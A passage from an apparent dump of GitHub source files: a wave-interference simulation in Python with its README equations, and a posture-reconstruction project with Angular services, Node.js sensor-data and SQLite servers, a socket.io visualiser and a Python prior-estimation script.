src=\"https://latex.codecogs.com/svg.latex?\\begin{align*}&space;\\therefore&space;I&space;&=&space;\\sin{\\frac{2\\pi&space;(d-k)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(d-\\frac{t&space;\\lambda&space;s}{f}&space;-&space;p&space;\\lambda&space;s)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(\\frac{fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s}{f})}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{align*}\" title=\"\\begin{align*} \\therefore I &= \\sin{\\frac{2\\pi (d-k)}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (d-\\frac{t \\lambda s}{f} - p \\lambda s)}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (\\frac{fd - t \\lambda s- fp \\lambda s}{f})}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (fd - t \\lambda s- fp \\lambda s)}{f \\lambda s}} \\end{align*}\" /></a>\n\nAlso, *k* gives the leading edge of the wave, allowing restriction of the wave domains:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;f(d)&space;\\left\\{&space;\\begin{array}{lr}&space;d>k&space;:&space;0\\\\&space;d\\leq&space;k:&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{array}&space;\\right.\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?I&space;=&space;f(d)&space;\\left\\{&space;\\begin{array}{lr}&space;d>k&space;:&space;0\\\\&space;d\\leq&space;k:&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{array}&space;\\right.\" title=\"I = f(d) \\left\\{ \\begin{array}{lr} d>k : 0\\\\ d\\leq k: \\sin{\\frac{2\\pi (fd - t \\lambda s- fp \\lambda s)}{f \\lambda s}} \\end{array} \\right.\" /></a>\n## Time Scale\nThe <a href=\"https://www.codecogs.com/eqnedit.php?latex=t_{\\text{seconds}}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?t_{\\text{seconds}}\" title=\"t_{\\text{seconds}}\" /></a> value above, is in terms of video seconds. However, if the waves are assumed to be sound in air, an absolute time value can be calculated. In one video second, the wave travels 1 wavelength. The speed of sound in air is 343 ms<sup>-1</sup>. Therefore, the sound wave takes <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{1}{343}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\frac{1}{343}\" title=\"\\frac{1}{343}\" /></a> virtual seconds to travel that one wavelength, 1m (only if <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\lambda&space;=&space;1\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\lambda&space;=&space;1\" title=\"\\lambda = 1\" /></a>). Therefore, 1 video second (25 frames) = <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{1}{343}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\frac{1}{343}\" title=\"\\frac{1}{343}\" /></a> virtual seconds.\n\n\n## Demo\nWatch on YouTube:\nhttps://www.youtube.com/watch?v=CgBImdjw3hc\n\n[](https://www.youtube.com/watch?v=CgBImdjw3hc)\n"
},
{
"alpha_fraction": 0.47329607605934143,
"alphanum_fraction": 0.48916199803352356,
"avg_line_length": 30.521127700805664,
"blob_id": "2aa8699a28ff183c8714df8e1348cf4290f4713d",
"content_id": "e424813c50eef21b1c1a006d31edaecf2eea0df8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4475,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 142,
"path": "/interference.py",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "import math,time,colour\nfrom PIL import Image, ImageDraw\n\ndef clamp(n,upper,lower):\n if n>upper:\n return 1\n elif n<lower:\n return -1\n else:\n return n\ndef get_dist2D(a,b):\n x = a[0]-b[0]\n y = a[1]-b[1]\n return math.sqrt((x**2)+(y**2))\ndef compile(images):\n img = images[0]\n for i in images[1:]:\n img = Image.alpha_composite(img,i)\n return img\nclass wave:\n @staticmethod\n def get_Intensity(d, f, t, s, w, p):\n '''\n Get Wave Intensity\n\n :param d: distance\n :param f: frame rate\n :param t: time (frames)\n :param s: scale (pixels per meter)\n :param w: wavelength\n :param p: phase (fraction of wavelegth)'''\n leading_edge = ((t*s*w)/f) + (p*w*s)\n if d>leading_edge:\n return 0\n else:\n return math.sin(\n (2*math.pi* ((f*d)-(t*s*w)-(f*p*w*s)))/(f*w*s)\n )\n @staticmethod\n def get_Peak(n,t,l,s,f):\n '''\n :param n: nth peak\n :param t: time(frames)\n :param l: lambda (wavelength)\n :param s: Scale (pixels per meter)\n :param f: frame rate '''\n return ((t-((n+0.75)*f))*l*s)/f\n @staticmethod\n def get_Trough(n,t,l,s,f):\n '''\n :param n: nth trough\n :param t: time(frames)\n :param l: lambda (wavelength)\n :param s: Scale (pixels per meter)\n :param f: frame rate '''\n return ((t-((n+0.25)*f))*l*s)/f\n\nclass handler:\n def __init__(self, sources=[], res=(0,0,), scale=1):\n '''\n :param sources: List of sources (class: source)\n :param res: Resolution\n :param scale: Pixel Scale/ pixels per metre'''\n self.sources = sources\n self.res = res\n self.scale = scale\n\n def render_img(self, time, frame_rate):\n img = Image.new('RGB', self.res)\n for x in range(self.res[0]):\n for y in range(self.res[1]):\n loc = (x,y,)\n i_total = 0\n for s in self.sources:\n i_total += wave.get_Intensity(\n get_dist2D(s.location, loc),\n frame_rate,\n time,\n self.scale,\n s.wavelength,\n s.phase\n )\n i_total = (i_total)/len(self.sources) #THIS MAKES MULTISOURCE UNIVERSE WAVES FADED\n img.putpixel((x,y,),colour.get_rgb(i_total))\n return img\n \n def render_animation(self, file, frames, frame_rate):\n for frame in range(frames[0],frames[1]):\n print(frame,end = '')\n out_img = self.render_img(frame, frame_rate)\n out_img.save('{}{}.png'.format(file,frame),format = 'PNG')\n print(': Saved')\n\n def render_contours(self, pOt, time, frame_rate):\n '''\n :param pOt: peak Or trough\n :param time: time (frames)\n '''\n rendered = []\n for s in self.sources:\n loc = s.location\n img_render = Image.new('RGBA', self.res)\n img_draw = ImageDraw.Draw(img_render, 'RGBA')\n i = 0\n while True:\n r = pOt(i, time, s.wavelength, self.scale, frame_rate)\n if r<0:\n break\n else:\n img_draw.ellipse((loc[0]-r, loc[1]-r, loc[0]+r, loc[1]+r),(0, 0, 0, 0),outline = 'white')\n i+=1\n del img_draw\n rendered.append(img_render)\n return compile(rendered)\n\n def animate_contours(self, file, frames, frame_rate):\n\n for frame in range(frames[0], frames[1]):\n print(frame, end='')\n\n out_t = self.render_contours(wave.get_Peak, frame, frame_rate)\n out_t.save('{}troughs{}.png'.format(file, frame), format = 'PNG')\n\n out_p = self.render_contours(wave.get_Trough, frame, frame_rate)\n out_p.save('{}peaks{}.png'.format(file, frame), format = 'PNG')\n\n print(': Saved')\n\nclass source:\n def __init__(self, location, wavelength, phase):\n self.location = location\n self.wavelength = wavelength\n self.phase = phase\n\nif __name__ == '__main__':\n res = (600,600,)\n s = [\n source((250,300,),1,-1),\n source((350,300,),1,0),\n ]\n u = handler(s,res,20)\n u.render_animation('test/anim',(0,500,),25)"
},
{
"alpha_fraction": 0.3813559412956238,
"alphanum_fraction": 0.4378530979156494,
"avg_line_length": 12.65384578704834,
"blob_id": "9c7b5878309ef527cb27f5a327c6c1a4e7051065",
"content_id": "107e8108dcd50d7ec883f2e2f0bcef99b89ffa83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 26,
"path": "/colour.py",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "#colour ramp\n\ndef get_rgb(n):\n return (\n int(get_r(n)*255),\n int(get_g(n)*255),\n int(get_b(n)*255)\n )\n\ndef get_r(n):\n if n>0:\n return 1.0\n else:\n return n+1\n\ndef get_b(n):\n if n<0:\n return 1.0\n else:\n return 1-n\n\ndef get_g(n):\n if n>=0:\n return 1-n\n else:\n return n+1"
}
] | 3 |
JW2473/Posture-Reconstruction
|
https://github.com/JW2473/Posture-Reconstruction
|
a9437a3dfda1f008003051c999696f565a5c41d8
|
d3b543fd534c54e85c440b9c44cd3b44a169243e
|
ad74734c428068b84bbc79f88aa12c16c9a0abc0
|
refs/heads/master
| 2020-04-07T05:47:59.338813 | 2019-01-18T05:03:06 | 2019-01-18T05:03:06 | 158,110,473 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7005494236946106,
"alphanum_fraction": 0.7204670310020447,
"avg_line_length": 45.967742919921875,
"blob_id": "b56a3edb552e46cad3a2431a9f4afd68f0b08b14",
"content_id": "e5df1ce908ec2bdcdc3cf4b2f901d074e42f205e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2912,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 62,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/db_service.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Promise = require('bluebird')\nconst db = require('sqlite')\nconst fs = require('fs')\nconst UPDATE_INTERVAL = 600\nconst dbInit = fs.readFileSync('./dbInit.sql').toString()\nvar dbPromise = db.open('./userActivityData.db', {Promise})\ndbPromise.then(() => db.exec(dbInit))\ndbPromise = startTransaction(dbPromise)\n\nvar insertSensorData100HzStmt\nvar insertSensorData20HzStmt\nvar insertSensorMessageStmt\n\nfunction insertSensorData100Hz (serverId, sensorId, serverSendTimestamp, data) {\n dbPromise = dbPromise.then(() => insertSensorData100HzStmt.run([serverId, sensorId, serverSendTimestamp, data.syncedTimestamp, data.timestamp, data.quat_w, data.quat_x, data.quat_y, data.quat_z, data.gyro_x, data.gyro_y, data.gyro_z, data.acc_x, data.acc_y, data.acc_z]))\n .catch(e => {\n console.log('insertSensorData100Hz Error:')\n console.log(e)\n })\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, serverSendTimestamp, data) {\n dbPromise = dbPromise.then(() => insertSensorData20HzStmt.run([serverId, sensorId, serverSendTimestamp, data.syncedTimestamp, data.timestamp, data.magn_x, data.magn_y, data.magn_z]))\n .catch(e => {\n console.log('insertSensorData20Hz Error:')\n console.log(e)\n })\n}\n\nfunction insertSensorMessage (serverId, sensorId, serverSendTimestamp, clientRecvTimestamp, clientSendTimestamp, serverRecvTimestamp, num100hzData, num20hzData) {\n dbPromise = dbPromise.then(() => insertSensorMessageStmt.run([serverId, sensorId, serverSendTimestamp, clientRecvTimestamp, clientSendTimestamp, serverRecvTimestamp, num100hzData, num20hzData]))\n .catch(e => {\n console.log('insertSensorMessage Error:')\n console.log(e)\n })\n}\n\nsetInterval(() => {\n dbPromise = startTransaction(dbPromise.then(() => db.run('commit')))\n}, UPDATE_INTERVAL)\n\nfunction startTransaction (p) {\n return p.then(() => db.run('BEGIN TRANSACTION'))\n .then(() => {\n return db.prepare('INSERT INTO SensorData100Hz(server_id, sensor_id, server_send_timestamp, sensor_synced_timestamp, sensor_raw_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, acc_x, acc_y, acc_z) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorData100HzStmt = stmt\n return db.prepare('INSERT INTO SensorData20Hz(server_id, sensor_id, server_send_timestamp, sensor_synced_timestamp, sensor_raw_timestamp, magn_x, magn_y, magn_z) VALUES(?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorData20HzStmt = stmt\n return db.prepare('INSERT INTO SensorMessage(server_id, sensor_id, server_send_timestamp, client_recv_timestamp, client_send_timestamp, server_recv_timestamp, num_100hz_data, num_20hz_data) VALUES (?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorMessageStmt = stmt\n })\n}\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorMessage: insertSensorMessage\n}\n"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7166666388511658,
"avg_line_length": 30.034482955932617,
"blob_id": "1f15cf770d9c07a8f48c45d33b6bc43b6d4bffce",
"content_id": "b6f57c3a8d37927f974f24afda6de9de0f20ca36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 29,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/app.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport { CommonModule } from '@angular/common';\n\nimport { AppComponent } from './app.component';\nimport { DataModelService } from './services/data-model.service';\nimport { SocketIoModule, SocketIoConfig } from './modules/ng2-socket-io';\nimport { SockService } from './services/sock.service';\nimport { wsAddr } from './serverAddr';\n\nimport { NvD3Module } from 'angular2-nvd3';\nimport { StickFigureComponent } from './components/stick-figure/stick-figure.component';\n\nconst config: SocketIoConfig = { url: wsAddr, options: {} };\n\n@NgModule({\n declarations: [\n AppComponent,\n StickFigureComponent,\n ],\n imports: [\n BrowserModule,\n SocketIoModule.forRoot(config),\n NvD3Module\n ],\n providers: [SockService, DataModelService],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n"
},
{
"alpha_fraction": 0.667397677898407,
"alphanum_fraction": 0.6714181303977966,
"avg_line_length": 31.188236236572266,
"blob_id": "b7b38081917160b5fba79b9cdefb51fe6c155c26",
"content_id": "8f8a2d8c727baa7ec5ec643a53b6a6812d9b3bdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 2736,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 85,
"path": "/oriTrakHAR-master/rawDataVis/src/app/services/sock.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Socket } from '../modules/ng2-socket-io';\nimport { DataModelService } from './data-model.service';\n// import { AngleData } from '../prototypes';\n\n@Injectable()\nexport class SockService {\n status = this.dataModel.status;\n constructor(private socket: Socket, private dataModel: DataModelService) {\n const self = this;\n const counter = 0;\n let lastTimeStamp = 0;\n socket.on('connect', (msg) => {\n console.log('on connect');\n });\n socket.on('newData', newDataHandle);\n socket.on('availableDates', availableDatesHandle);\n socket.on('playEnd', playEndHandle);\n socket.on('disconnect', playEndHandle);\n socket.on('updateHist', updateHistHandle);\n socket.on('availableClusters', availableClustersHandle);\n socket.on('clusterData', clusterDataHandle);\n function newDataHandle(msg) {\n // console.log(msg);\n dataModel.status[msg.id].quaternion.w = msg.quat.w;\n dataModel.status[msg.id].quaternion.x = msg.quat.x;\n dataModel.status[msg.id].quaternion.y = msg.quat.y;\n dataModel.status[msg.id].quaternion.z = msg.quat.z;\n const approximatedTimestamp = Math.floor(msg.quat.timestamp / 1000) * 1000;\n if (approximatedTimestamp !== lastTimeStamp) {\n // console.log(`new msg ${msg.quat.timestamp}`);\n dataModel.status.playingTime = new Date(msg.quat.timestamp);\n lastTimeStamp = msg.quat.timestamp;\n }\n }\n\n function playEndHandle(msg) {\n dataModel.status.playing = false;\n }\n\n function availableDatesHandle(msg) {\n dataModel.status.availableDates = msg;\n }\n\n function updateHistHandle(msg) {\n dataModel.newHistUpdate.next(msg);\n }\n\n function availableClustersHandle(msg) {\n dataModel.status.availableClusters = msg;\n }\n\n function clusterDataHandle(data) {\n dataModel.clusterData[data.cluster_id] = data.dataByCluster;\n var clustersOnOff = {}\n\n Object.keys(data.dataByCluster).forEach(d => {\n clustersOnOff[d] = true\n });\n dataModel.status.clustersOnOff = clustersOnOff\n dataModel.updateDisplayClusterData();\n }\n }\n\n public play(start, end, ratio, data) {\n this.socket.emit('play', {start, end, ratio, data});\n }\n\n public stop() {\n this.socket.emit('stop', {});\n }\n\n public pause() {\n this.socket.emit('pause', {});\n }\n\n public updateHist() {\n this.socket.emit('updateHist', {start: this.status.histStartTime.valueOf(), end: this.status.histEndTime.valueOf(), source: this.status.selectedHistSource, data: this.status.selectedDate})\n }\n\n public getClusterData(clusterName) {\n this.socket.emit('requestClusterData', {clusterId: this.status.availableClusters[clusterName]})\n }\n\n}\n"
},
{
"alpha_fraction": 0.594565212726593,
"alphanum_fraction": 0.665217399597168,
"avg_line_length": 40.818180084228516,
"blob_id": "e25606bb56d588b669bebd2516caee2941e14ab8",
"content_id": "25de7f58186a92cc344869aa9062c0c01ff48afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2760,
"license_type": "no_license",
"max_line_length": 236,
"num_lines": 66,
"path": "/python-code/calc_prior.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "from processData import readData, InterpoQuat\nimport subprocess\nimport transformations\nimport numpy as np\n\nwrist_file_name = 'leftWrist.csv'\nelbow_file_name = 'leftElbow.csv'\ntorso_file_name = 'torso.csv'\nbucketSize = 5\n\nf = open('leftPrior', 'w')\nw = readData([0, 1, 2], wrist_file_name)\ne = readData([0, 1, 2], elbow_file_name)\nt = readData([0, 1, 2], torso_file_name)\ntail = subprocess.run('tail '+wrist_file_name, stdout=subprocess.PIPE, shell=True)\ntail = tail.stdout.decode('utf-8')\nlastline = tail.split('\\n')[-2]\nmax_time = lastline.split(', ')[-1]\nt = np.linspace(5, max_time, (max_time-5)*50)\nwristQuats = InterpoQuat(w).evaluate(t)\nelbowQuats = InterpoQuat(e).evaluate(t)\ntorsoQuats = InterpoQuat(t).evaluate(t)\n\nfor i in range(-175, 176, 5):\n prior[i] = {}\n for j in range(-175, 176, 5):\n prior[i][j] = {}\n for k in range(-175, 176, 5):\n prior[i][j][k] = np.zeros([21, 21, 21])\n\nfor i in t:\n torsoQuat = next(torsoQuats)\n wristQuat = next(wristQuats)\n elbowQuat = next(elbowQuats)\n wristRelativeQuat = torsoQuat.inverse*wristQuat\n elbowRelativeQuat = elbowQuat.inverse*elbowQuat\n wristEuler = transformations.euler_from_quaternion([wristRelativeQuat[1], wristRelativeQuat[2], wristRelativeQuat[3], wristRelativeQuat[0]])\n elbowEuler = transformations.euler_from_quaternion([elbowRelativeQuat[1], elbowRelativeQuat[2], elbowRelativeQuat[3], elbowRelativeQuat[0]])\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -1])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][elbowRelativePos[0]*10 + 10][elbowRelativePos[1]*10 + 10][elbowRelativePos[2]*10 + 10] += 0.5\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -1.1])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][min(max(elbowRelativePos[0]*10 + 10, 0), 20)][min(max(elbowRelativePos[1]*10 + 10, 0), 21)][min(max(elbowRelativePos[2]*10 + 10, 0), 20)] += 0.25\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -0.9])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][elbowRelativePos[0]*10 + 10][elbowRelativePos[1]*10 + 10][elbowRelativePos[2]*10 + 10] += 0.25\n\nfor i in range(-175, 176, 5):\n for j in range(-175, 176, 5):\n for k in range(-175, 176, 5):\n if np.sum(prior[i][j][k]) == 0:\n prior[i][j][k] = None\n else:\n prior[i][j][k] = prior[i][j][k].tostring()\n\njson.dump(prior, f)\nf.close()\n\ndef rad2Bucket(rad):\n radInterval = bucketSize*3.1415926/180\n ans = math.floor(rad / radInterval) * bucketSize\n if ans == 180:\n return 180 - bucketSize\n else:\n return ans\n\ndef deg2rad(deg):\n return deg * 3.1415926 / 180\n"
},
{
"alpha_fraction": 0.7309644818305969,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 63.66666793823242,
"blob_id": "b5a06d13e0dd059a5def8e2062134d5ef26ad4ad",
"content_id": "780db4fff880c6f5d9c0b299951100c848622f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 3,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/modules/ng2-socket-io/index.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "export { Ng2SocketIoModule as SocketIoModule } from './ng2-socket-io.module';\r\nexport { SocketIoConfig } from './socketIoConfig';\r\nexport { SocketIoService as Socket } from './socket-io.service';\r\n"
},
{
"alpha_fraction": 0.6486860513687134,
"alphanum_fraction": 0.6671277284622192,
"avg_line_length": 27.920000076293945,
"blob_id": "407f3385a339cb913da09c474c4833710d17d872",
"content_id": "ce945bd79ffe9fbf6f0c47ac481e3eb50bb8d702",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2169,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 75,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/oldDataServer/dataServer_backup.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst net = require('net')\nconst os = require('os')\nconst dataServer = net.createServer()\nconst config = require('./config')\n// const dbService = require('./db_service')\n// const Promise = require('bluebird')\n// const realtimeVis = require('./realtimeVis')\n// const express = require('express')\n\n// var app = express()\nvar macAddr\nconst platform = os.platform()\nif (platform === 'darwin') {\n macAddr = os.networkInterfaces().en3[0].mac\n} else if (platform === 'linux') {\n try {\n macAddr = os.networkInterfaces().wlan0[0].mac // change wlan0 to what ever interface you are using\n } catch (e) {\n macAddr = os.networkInterfaces().wlan1[0].mac // change wlan0 to what ever interface you are using\n }\n}\nconst machineId = mac2Id(macAddr)\n\nvar clients = {}\nvar clientIDList = []\nvar curPollClientID = 0\n\ndataServer.on('connection', socket => {\n const clientId = socket.remoteAddress.split(':')[3]\n if (!clients.hasOwnProperty(clientId)) {\n clients[clientId] = {\n sock: socket,\n mac: ''\n }\n }\n clientIDList.push(clientId)\n socket.on('data', processDataGen(clientId))\n socket.on('end', () => { delClient(clientId) })\n socket.on('error', err => {\n console.log(err)\n socket.end()\n delClient(clientId)\n })\n})\n\nfunction delClient (clientId) {\n clientIDList = clientIDList.filter(id => id !== clientId)\n delete clients[clientId]\n}\n\ndataServer.listen(config.PORT)\n\nsetInterval(() => {\n if (clientIDList.length > 0) {\n var msg = Buffer.alloc(4)\n msg.writeFloatLE(new Date().valueOf(), 0)\n console.log(`${msg} len-${msg.length}`)\n clients[clientIDList[curPollClientID]].sock.write(msg)\n curPollClientID++\n if (curPollClientID >= clientIDList.length) {\n curPollClientID = 0\n }\n }\n}, config.POLL_INTERVAL)\n\nfunction processDataGen (clientId) {\n return function processData (data) {\n console.log(`got data from id ${clientId} and data length: ${data.length}`)\n }\n}\n\nfunction mac2Id (mac) {\n return Buffer.from([Buffer.from(mac.substring(6, 8), 16), Buffer.from(mac.substring(9, 11), 16), Buffer.from(mac.substring(12, 14), 16), Buffer.from(mac.substring(15, 17), 16)].join('')).readUInt32LE(0)\n}\n"
},
{
"alpha_fraction": 0.6094478964805603,
"alphanum_fraction": 0.652324378490448,
"avg_line_length": 36.34269714355469,
"blob_id": "b7d6d98839df9184ae3632eb639a82866b7b6767",
"content_id": "c890debca1f31aa3ac6167ec6ac4cbe1306c98cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6647,
"license_type": "no_license",
"max_line_length": 320,
"num_lines": 178,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/realtimeVis.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst THREE = require('three.js-node')\nconst WSServer = require('http').createServer()\nconst io = require('socket.io')(WSServer)\nconst config = require('./config')\nconst ANGLE_MAP_R = require('./rightDict_yzx.json')\nconst ANGLE_MAP_L = require('./leftDict_yzx.json')\n\nWSServer.listen(config.SOCKET_IO_PORT, '0.0.0.0')\n\nconst originAxis = {\n w: 0,\n x: 0,\n y: 1,\n z: 0\n}\n\nconst torsoInitQuat = {\n w: 0.74725341796875,\n x: -0.08258056640625,\n y: -0.01483154296875,\n z: 0.65924072265625\n}\n\nconst headInitQuat = {\n w: 0.7724609375,\n x: -0.03839111328125,\n y: -0.1016845703125,\n z: 0.62567138671875\n}\n\nvar torsoOffset = q12q2(torsoInitQuat, originAxis)\nvar headOffset = q12q2(headInitQuat, originAxis)\n\n// torsoOffset = {\n// w: -0.01483116439305834,\n// x: 0.6592238955120293,\n// y: 0.747234344297174,\n// z: 0.08257845853418903\n// }\n\nvar curTorso = {}\n\nfunction updateRealtimeVis (quat, idStr) {\n var z = quat.z\n quat.z = quat.x\n quat.x = quat.y\n quat.y = z\n\n switch (config.SENSOR_DICT[idStr]) {\n case 'torso':\n curTorso = getQuaternionProduct(quat, torsoOffset)\n\n // console.log(`torsoOffset: ${JSON.stringify(torsoOffset, null, 2)}`)\n // console.log(`headOffset: ${JSON.stringify(headOffset, null, 2)}`)\n\n // var euler = new THREE.Euler().setFromQuaternion(curTorso, config.EULER_ORDER)\n // console.log(`torso: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(curTorso, null, 2)}\n // ${JSON.stringify(euler)}\n // `)\n // torsoCalibrate(quat)\n io.sockets.emit('newData', {\n id: config.SENSOR_DICT[idStr],\n quat: curTorso\n })\n break\n case 'head':\n // console.log(`head: ${JSON.stringify(quat, null, 2)}\\n ${JSON.stringify(getQuaternionProduct(quat, headOffset), null, 2)}`)\n var headQuat = getQuaternionProduct(quat, headOffset)\n // var euler = new THREE.Euler().setFromQuaternion(headQuat, config.EULER_ORDER)\n // console.log(`head: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(headQuat, null, 2)}\n // ${JSON.stringify(euler)}\n // `)\n io.sockets.emit('newData', {\n id: config.SENSOR_DICT[idStr],\n quat: headQuat\n })\n\n break\n case 'rightArm':\n if (curTorso.w) {\n let relativeAngle = q12q2(curTorso, quat)\n let relativeQuat = new THREE.Quaternion(relativeAngle.x, relativeAngle.y, relativeAngle.z, relativeAngle.w)\n let relativeEuler = new THREE.Euler().setFromQuaternion(relativeQuat, config.EULER_ORDER)\n\n let ans = ANGLE_MAP_R[rad2Bucket(relativeEuler._y)][rad2Bucket(relativeEuler._z)][rad2Bucket(relativeEuler._x)]\n if (ans.shoulderX !== null) {\n let upperArmRelativeEuler = new THREE.Euler(deg2rad(ans.shoulderX), deg2rad(ans.shoulderY), deg2rad(ans.shoulderZ), config.EULER_ORDER)\n let upperArmQuat = getQuaternionProduct(curTorso, new THREE.Quaternion().setFromEuler(upperArmRelativeEuler))\n let quatEuler = new THREE.Euler().setFromQuaternion(quat, config.EULER_ORDER)\n let curTorsoEuler = new THREE.Euler().setFromQuaternion(curTorso, config.EULER_ORDER)\n console.log(`Torso: ${rad2Bucket(curTorsoEuler.y)} ${rad2Bucket(curTorsoEuler.z)} ${rad2Bucket(curTorsoEuler.x)} R: ${rad2Bucket(quatEuler.y)} ${rad2Bucket(quatEuler.z)} ${rad2Bucket(quatEuler.x)} --- ${rad2Bucket(relativeEuler._y)} ${rad2Bucket(relativeEuler._z)} ${rad2Bucket(relativeEuler._x)}`)\n io.sockets.emit('newData', {id: 'rightUpper', quat: upperArmQuat})\n }\n io.sockets.emit('newData', {id: 'rightLower', quat: quat})\n }\n break\n\n case 'leftArm':\n if (curTorso.w) {\n let relativeAngle = q12q2(curTorso, quat)\n let relativeQuat = new THREE.Quaternion(relativeAngle.x, relativeAngle.y, relativeAngle.z, relativeAngle.w)\n let relativeEuler = new THREE.Euler().setFromQuaternion(relativeQuat, config.EULER_ORDER)\n\n let ans = ANGLE_MAP_L[rad2Bucket(relativeEuler._y)][rad2Bucket(relativeEuler._z)][rad2Bucket(relativeEuler._x)]\n if (ans.shoulderX !== null) {\n let upperArmRelativeEuler = new THREE.Euler(deg2rad(ans.shoulderX), deg2rad(ans.shoulderY), deg2rad(ans.shoulderZ), config.EULER_ORDER)\n let upperArmQuat = getQuaternionProduct(curTorso, new THREE.Quaternion().setFromEuler(upperArmRelativeEuler))\n // let quatEuler = new THREE.Euler().setFromQuaternion(quat, config.EULER_ORDER)\n // console.log(`L: ${rad2Bucket(quatEuler.y)} ${rad2Bucket(quatEuler.z)} ${rad2Bucket(quatEuler.x)} --- ${rad2Bucket(relativeEuler._y)} ${rad2Bucket(relativeEuler._z)} ${rad2Bucket(relativeEuler._x)}`)\n io.sockets.emit('newData', {id: 'leftUpper', quat: upperArmQuat})\n }\n io.sockets.emit('newData', {id: 'leftLower', quat: quat})\n }\n break\n }\n}\n\nfunction getQuaternionProduct (q, r) {\n // ref: https://www.mathworks.com/help/aeroblks/quaternionmultiplication.html\n return {\n w: r.w * q.w - r.x * q.x - r.y * q.y - r.z * q.z,\n x: r.w * q.x + r.x * q.w - r.y * q.z + r.z * q.y,\n y: r.w * q.y + r.x * q.z + r.y * 